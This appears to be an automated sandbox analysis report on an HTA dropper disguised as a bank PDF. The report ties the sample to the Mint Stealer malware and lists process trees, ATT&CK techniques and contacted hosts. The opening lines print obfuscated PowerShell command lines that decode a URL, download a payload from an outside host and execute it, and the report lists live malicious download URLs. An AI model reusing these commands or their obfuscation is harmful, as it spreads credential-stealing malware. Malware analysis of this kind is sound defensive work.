          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3448, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match | File source: 0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3448, type: MEMORYSTR

          MITRE ATT&CK Matrix (techniques listed per tactic; the digits preceding a technique are the count badges rendered in the report)

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
          Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
          Execution: 11 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 Exploitation for Client Execution; Cron; Launchd; Scheduled Task
          Persistence: 11 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
          Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
          Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
          Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 14 System Information Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
          Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
          Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

          Behavior Graph

          Behavior Graph ID: 1576834; Sample: PKO_0019868519477_PDF_#U246...; Startdate: 17/12/2024; Architecture: WINDOWS; Score: 100
          Sample-level signatures: Suricata IDS alerts for network traffic; Yara detected Mint Stealer; Sigma detected: Suspicious MSHTA Child Process; 7 other signatures

          Hosts contacted: pko-download.kagyouth.co.ke (45.11.180.77, port 443, M247GB Germany); gsosnub8zg3.top (193.149.129.61, port 80, DANISCODK Denmark); www.google.com (172.217.19.228, port 80, GOOGLEUS United States); 127.0.0.1 (unknown)

          Process tree (signatures attached to a node in brackets):
          mshta.exe: connects to pko-download.kagyouth.co.ke:443; drops C:\Users\user\...\676198543e2f1[1].vbs (ASCII)
            cmd.exe (also starts conhost.exe)
              wscript.exe [Obfuscated command line found; Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found; Creates processes via WMI]: drops C:\Users\user\AppData\Local\Temp\riodfc.js (ISO-8859)
                wscript.exe [Windows Scripting host queries suspicious COM object (likely to drop second stage)]
            cmd.exe (also starts conhost.exe)
              wscript.exe [System process connects to network (likely due to code injection or exploit)]
                wscript.exe
                  conhost.exe [Obfuscated command line found]
                    powershell.exe [Queries Google from non browser process on port 80]: connects to gsosnub8zg3.top:80 and www.google.com:80
                  conhost.exe
                    powershell.exe
            cmd.exe (also starts conhost.exe)
              curl.exe: connects to 127.0.0.1; drops C:\Users\Public\676198543e2f3.vbs (ASCII)

          Source | Detection | Scanner | Label | Link
          PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta | 0% | ReversingLabs
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          gsosnub8zg3.top | 193.149.129.61 | true | true | | unknown
          pko-download.kagyouth.co.ke | 45.11.180.77 | true | true | | unknown
          www.google.com | 172.217.19.228 | true | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js | true | Avira URL Cloud: safe | unknown
          https://pko-download.kagyouth.co.ke/list_files.php | true | Avira URL Cloud: safe | unknown
          http://gsosnub8zg3.top/1.php?s=mints21 | true | Avira URL Cloud: safe | unknown
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs | true | Avira URL Cloud: safe | unknown
          https://pko-download.kagyouth.co.ke/js/pmxdhq.txt | true | Avira URL Cloud: safe | unknown
          https://pko-download.kagyouth.co.ke/js/riodfc.txt | true | Avira URL Cloud: safe | unknown
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs | true | Avira URL Cloud: safe | unknown
          http://www.google.com/ | false | | high
          Name | Source | Malicious | Antivirus Detection | Reputation
                                    http://schema.org/WebPagepowershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.00000159010D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.00000159010FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://pko-download.kagyouth.co.ke/list_files.phpitXwscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1899786645.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895382763.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://0.google.com/powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/webhp?tab=wwpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbssmshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.google.com/logos/doodles/2024/seasonal-holidays-20powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsfv8G2mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://contoso.com/powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com/finance?tab=wepowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.google.compowershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs(fF$mshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://apis.google.compowershell.exe, 0000000F.00000002.1982995994.0000021C1FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FE35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F82F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://pko-download.kagyouth.co.ke/js/riodfc.txtYqHwscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1899786645.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895382763.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.1967997619.0000021C0F821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.blogger.com/?tab=wjpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://pko-download.kagyouth.co.ke/jsq.jswscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js3mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbscurlcurl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1811615559.0000000003420000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbskcurl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://play.google.com/?hl=en&tab=w8powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 0000000F.00000002.1982995994.0000021C1FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F82F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbstvmshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbssmshta.exe, 00000000.00000002.1842663260.0000000005E4D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1839442231.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1834157948.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1834220338.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833194096.0000000005E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://go.micropowershell.exe, 0000000F.00000002.1967997619.0000021C10955000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590113A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
